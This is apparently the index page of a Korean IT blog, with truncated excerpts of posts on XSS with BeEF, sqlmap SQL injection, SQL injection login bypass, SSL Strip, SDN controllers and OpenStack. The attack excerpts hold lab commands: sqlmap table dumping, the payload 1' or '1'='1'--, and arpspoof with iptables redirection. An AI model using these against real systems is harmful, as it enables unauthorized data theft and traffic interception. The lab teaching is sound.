| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 |
- 코딩테스트
- 코딩 테스트
- osi7layer
- database
- coding test
- TDD
- Container
- Python
- Linux
- programmers
- MySQL
- 데이터베이스
- 트레바리
- 스노트
- docker
- 컨테이너
- db
- 라우터
- snort
- 리눅스
- OSI7계층
- Cosmos
- 프로그래머스
- 라우팅프로토콜
- Router
- Routing
- 라우팅
- Snort Rule
- 도커
- 스노트 룰
- Today
- Total
목록전체 (202)
Simple is IT, 누구나 보고 누구나 깨닫는 IT
XSS(Cross Site Scripting, BeEF, Session Hijaking) 및 예방법
XSS(Cross Site Scripting) ?DB에 저장되는 곳 중 입력 값으로 웹 상에서 동작할 수 있는 스크립트 코드를 삽입하는 공격ex) 입력 데이터에 삽입 -> 데이터 조회 시 alert 창이 나타나면 성공이다. 해당 내용 입력 후 게시글로 접속을 해보면 위와 같이 메세지 박스가 출력이 된다. BeEF를 이용한 XSS BeEF : 웹 브라우저로 페이지를 읽을 때 JS 형태로 동작, 사용자 PC의 정보 수집, 메타 스플로잇 모듈을 이용한 광범위한 공격까지 가능한 도구 설치) # git clone https://github.com/beefproject/beef # cd beef # ./install 설치가 완료되면 아래와 같이 완료가 되었다는 텍스트가 출력이 되는데, 실행하기..
SQL 인젝션 (sqlmap 사용 - Kali Linux)
자동화 도구(sqlmap, 하비지 등) SQLmap 설치 : apt-get insatll sqlmap -y sqlmap -u [공격 URL] --dbs //단, 공격 URL은 GET방식 데이터를 전달하는 주소, DBMS 종류 및 DB 이름 알아내기 sqlmap -u [공격 URL] -D [DB명] --tables // 테이블명 알아내기 sqlmap -u [공격 URL] -D [DB명] -T [테이블명] --columns // 테이블의 칼럼명 알아내기 sqlmap -u [공격 URL] -D [DB명] -T [테이블명] -C [칼럼명] --dump // 데이터 알아내기 sqlmap -u [URL] --dbs sqlmap -u 192.168.10.5:9090/board_view.asp?num=1 --dbs D..
WEB 해킹 및 보안 취약점 파악(SQL 인젝션)
(OWASP Top Ten) 전 세계에서 가장 많이 발생하는 취약점 리스트이다.(주로 확인하게 될 내용) 인젝션(SQL, OS, XXE, LDAP 등) SQL(Bypass, Blind) 로그인 환경에서 SQL 쿼리문을 이용한 공격 Bypass 1' or '1'='1'## 위 로그인 환경의 DB 쿼리 부분이다. : Select * From member where Id = 'id' and Pass= 'pw' id 부분에서 1' or '1'='1'-- 를 집어넣게되면 -> Select * From member where ld = '1' or '1' = '1'##' and Pass= 'pw' -> id부분에 넣은 내용으로 인해 참이 되었고 -- 은 뒷 내용의 주석을 의미한다.(MSsql : --) ..
OpenDayLight(SDN Controller, Openflow) Flow Rules 추가
OpenDayLight(ODL): 오픈소스 SDN Controller(제어기) 중 하나 모든 테스트는 이전 포스팅을 기준으로 한다.필요한 요소들 OpenDayLight 기본 구성 상태 Mininet Postman(공식페이지 다운로드) 준비OpenDayLight 실행 Mininet Single Topology 구성 Mininet> pingall 서로 통신이 되지 않는 이유는 이전 포스팅에서 설명했다. 이제 본격적으로 Postman을 이용해 Flow Rule을 추가할 것첫 번째로 h1과 h2의 ping 통신을 확인할 수 있도록 해보자.다음 Rule Code를 사용할 것이다.(예시) Table id가 0이고, Flow id가 flow_1인 Flow Table에서in-port(들어오는 포트, 호스..
OpenDayLight (SDN Controller, Openflow)
OpenDayLight(ODL) : 오픈소스 SDN Controller(제어기) 중 하나 OpenDayLight 설치 아래 사이트에 프로그램 설치 파일이 있다. https://docs.opendaylight.org/en/latest/downloads.html Openjdk 설치 후에 진행한다. # wget [받을 파일 주소] # tar -zxvf [받은 파일] 실행 해보자 ! # cd opendaylight/bin # ./karaf > feature:list | grep dlux-core 이런 패키지(?)가 있는 것을 확인 > feature:install odl-dlux-core > feature:install odl-dlux-topology (dashboard 모드를 위한 기본적인 파일과 토폴로지화면을..
Mininet!! SDN(Software Defined Networking, Openflow) 설정
SDN(Software Defined Networking)- 네트워크 제어 기능이 물리적 네트워크와 분리되도록 프로그래밍한 네트워크 구조- 네트워크 제어 기능을 데이터 전달 기능과 분리해 구현한다. SDN을 가장 간략하게 표현한 그림 !! 자세한 내용은 이전 포스팅 확인https://blog.naver.com/hyun0524e/221838513601 Ubuntu:16.04Mininet- 일반 PC에서 쉽게 가상의 네트워크 환경을 구성, Openflow를 활용한 SDN과 같은 네트워크 환겨을 구성해볼 수 있는 프로그램이다. Mininet 설치 # apt-get insatll git -y # cd mininet # git tag // version # cd util # ./install.sh..
SSL Strip
SSL ? : 전송계층의 보안 프로토콜이다. (HTTP 통신을 암호화하는데 사용) SSL Strip : MITM 공격을 수행하고 있을 때 Hacker - Target = http 통신, Web - Hacker = https 통신하며 접속 허용, 비정상 통신 수행 Hacker 192.168.10.6 (Kali Linux) Target 192.168.10.8 (Windows XP) Gateway 192.168.10.2 Hacker # arpspoof -t 192.168.10.2 192.168.10.8 # arpspoof -t 192.168.10.8 192.168.10.2 # fragrouter -B1 # apt-get install iptables -y # iptables -t nat -A PREROUTIN..
Openstack 설치해보자 ! (Devstack_ocata, Ubuntu)
Openstack을 설치하기 위한 최소 사양 Controller Node (Core Component) CPU Processor 1-2, RAM 8GB, Storage 100GB, 2 NIC Compute Node (Core Component) CPU Processor 2-4, RAM 8GB, Storage 100GB, 2 NIC Block Storage Node (Optional) CPU Processor 1-2, RAM 4GB, Storage 100GB, 1 NIC Object Storage Node (Optional) CPU Processor 1-2, RAM 4GB, Storage 100GB, 1 NIC Devstack 설치(Ocata) Ubuntu 환경에서 Network 환경 설정을 마친 상태를 ..